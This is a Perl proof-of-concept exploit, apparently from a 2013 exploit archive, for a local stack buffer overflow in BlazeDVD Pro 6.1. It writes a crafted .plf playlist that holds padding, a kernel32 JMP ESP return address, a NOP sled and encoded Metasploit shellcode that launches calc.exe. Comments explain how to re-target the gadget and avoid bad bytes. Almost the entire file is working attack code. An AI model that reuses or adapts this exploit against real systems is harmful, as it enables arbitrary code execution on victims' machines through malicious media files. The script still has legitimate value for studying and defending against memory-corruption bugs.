#!/usr/bin/perl
# BlazeDVD Pro player 6.1 Local stack based buffer overflow
# Author: PuN1sh3r
# Email: luiguibiker@gmail.com
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials
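use strict;
use warnings;

# Output file: a BlazeDVD playlist (.plf) carrying the overflow payload.
my $file = "blazeExpl.plf";

# Padding up to the saved return address: 260 bytes of 'A' (0x41).
# This offset is the one the original PoC used against BlazeDVD Pro 6.1;
# it is build-specific and should be re-verified against any other version.
my $junk = "\x41" x 260;

# Overwritten return address, little-endian: 0x77E4FE33 = JMP ESP in kernel32.dll.
# The address is tied to the kernel32.dll of the tested platform (Windows 2003
# Server SP1 EN, per the header). kernel32 differs between builds/service packs
# and is randomized by ASLR on Vista and later, so the gadget must be re-located
# (e.g. with mona.py) before this PoC is reused anywhere else.
my $eip = "\x33\xFE\xE4\x77";

# Metasploit windows/exec CMD=calc.exe, encoded with x86/alpha_mixed.
# The first bytes are the encoder's GetPC stub; the remainder is alphanumeric.
my $shellcode =
    "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
    "\x42\x75\x4a\x49\x49\x6c\x78\x68\x4d\x59\x67\x70\x77\x70" .
    "\x43\x30\x65\x30\x6b\x39\x5a\x45\x76\x51\x59\x42\x52\x44" .
    "\x6e\x6b\x71\x42\x46\x50\x6e\x6b\x56\x32\x36\x6c\x4e\x6b" .
    "\x53\x62\x66\x74\x6c\x4b\x33\x42\x36\x48\x34\x4f\x6f\x47" .
    "\x51\x5a\x75\x76\x75\x61\x39\x6f\x45\x61\x79\x50\x6c\x6c" .
    "\x67\x4c\x70\x61\x53\x4c\x66\x62\x36\x4c\x57\x50\x5a\x61" .
    "\x7a\x6f\x46\x6d\x63\x31\x5a\x67\x4a\x42\x4a\x50\x72\x72" .
    "\x33\x67\x6c\x4b\x76\x32\x76\x70\x6c\x4b\x53\x72\x35\x6c" .
    "\x46\x61\x4a\x70\x6e\x6b\x31\x50\x50\x78\x6b\x35\x39\x50" .
    "\x54\x34\x62\x6a\x67\x71\x4e\x30\x30\x50\x6c\x4b\x52\x68" .
    "\x35\x48\x6e\x6b\x70\x58\x51\x30\x43\x31\x6a\x73\x5a\x43" .
    "\x55\x6c\x43\x79\x6c\x4b\x37\x44\x4c\x4b\x37\x71\x69\x46" .
    "\x36\x51\x39\x6f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x5a\x6f" .
    "\x64\x4d\x37\x71\x5a\x67\x46\x58\x79\x70\x43\x45\x4b\x44" .
    "\x77\x73\x31\x6d\x4b\x48\x47\x4b\x51\x6d\x46\x44\x50\x75" .
    "\x39\x72\x30\x58\x6c\x4b\x53\x68\x75\x74\x35\x51\x59\x43" .
    "\x65\x36\x6c\x4b\x36\x6c\x52\x6b\x6e\x6b\x42\x78\x47\x6c" .
    "\x63\x31\x48\x53\x6e\x6b\x63\x34\x4e\x6b\x56\x61\x7a\x70" .
    "\x6c\x49\x73\x74\x34\x64\x56\x44\x63\x6b\x53\x6b\x43\x51" .
    "\x61\x49\x43\x6a\x66\x31\x4b\x4f\x4b\x50\x31\x48\x71\x4f" .
    "\x33\x6a\x6c\x4b\x32\x32\x48\x6b\x6e\x66\x31\x4d\x51\x7a" .
    "\x76\x61\x6c\x4d\x6e\x65\x4f\x49\x37\x70\x67\x70\x63\x30" .
    "\x72\x70\x70\x68\x44\x71\x4e\x6b\x32\x4f\x6b\x37\x39\x6f" .
    "\x38\x55\x4f\x4b\x7a\x50\x6d\x65\x6c\x62\x70\x56\x55\x38" .
    "\x6f\x56\x4d\x45\x6d\x6d\x6f\x6d\x39\x6f\x4b\x65\x55\x6c" .
    "\x74\x46\x63\x4c\x55\x5a\x6d\x50\x49\x6b\x6b\x50\x64\x35" .
    "\x67\x75\x6f\x4b\x72\x67\x57\x63\x71\x62\x62\x4f\x30\x6a" .
    "\x57\x70\x36\x33\x69\x6f\x68\x55\x73\x53\x61\x71\x72\x4c" .
    "\x30\x63\x44\x6e\x70\x65\x32\x58\x32\x45\x65\x50\x41\x41";

# A short NOP sled after the return address gives the JMP ESP some slack in
# where ESP actually points when the overwritten return is taken.
my $nops = "\x90" x 50;

# Final layout: [padding][EIP][NOP sled][shellcode]
my $payload = $junk . $eip . $nops . $shellcode;

# Bad-character sanity check. The payload goes into a .plf playlist, which the
# player presumably reads as a text line, so a NUL or line-break byte would
# very likely truncate it before the overflow completes (assumed bad-char set;
# confirm against the target if the payload is changed). The current payload
# contains none of these; the check only guards future edits.
if ($payload =~ /[\x00\x0a\x0d]/) {
    die "payload contains a NUL or line-break byte; re-encode the shellcode\n";
}

# Three-arg open on a lexical handle, every I/O step checked: a silently
# failed or half-written payload file is indistinguishable from a bad offset
# when the target simply does not crash.
open my $fh, '>', $file or die "Cannot open $file for writing: $!\n";
binmode $fh;    # raw bytes: on Windows, text mode would rewrite any 0x0A as 0x0D 0x0A
print {$fh} $payload or die "Cannot write to $file: $!\n";
close $fh or die "Cannot close $file: $!\n";    # buffered write errors surface here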
###############################################################